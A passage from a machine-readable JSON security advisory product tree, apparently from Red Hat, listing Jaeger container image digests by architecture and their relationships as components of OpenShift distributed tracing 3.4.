"registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "product": { "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "product_id": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-agent-rhel8@sha256%3A6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "product": { "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "product_id": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-all-in-one-rhel8@sha256%3Ab7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "product": { "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "product_id": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-collector-rhel8@sha256%3A0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "product": { "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "product_id": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-index-cleaner-rhel8@sha256%3A25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "product": { "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "product_id": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-rollover-rhel8@sha256%3Af454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "product": { "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "product_id": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-ingester-rhel8@sha256%3Ac322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le", "product": { "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le", "product_id": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-rhel8-operator@sha256%3Af6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "product": { "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "product_id": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-query-rhel8@sha256%3A56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt" } } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "product": { "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "product_id": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-agent-rhel8@sha256%3A204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "product": { "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "product_id": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-all-in-one-rhel8@sha256%3A10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "product": { "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "product_id": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-collector-rhel8@sha256%3A153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "product": { "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "product_id": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-index-cleaner-rhel8@sha256%3A2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "product": { "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "product_id": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-rollover-rhel8@sha256%3A8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "product": { "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "product_id": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-ingester-rhel8@sha256%3Af5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "product": { "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "product_id": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-rhel8-operator@sha256%3A01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "product": { "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "product_id": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-query-rhel8@sha256%3A7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt" } } } ], "category": "architecture", "name": "s390x" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { 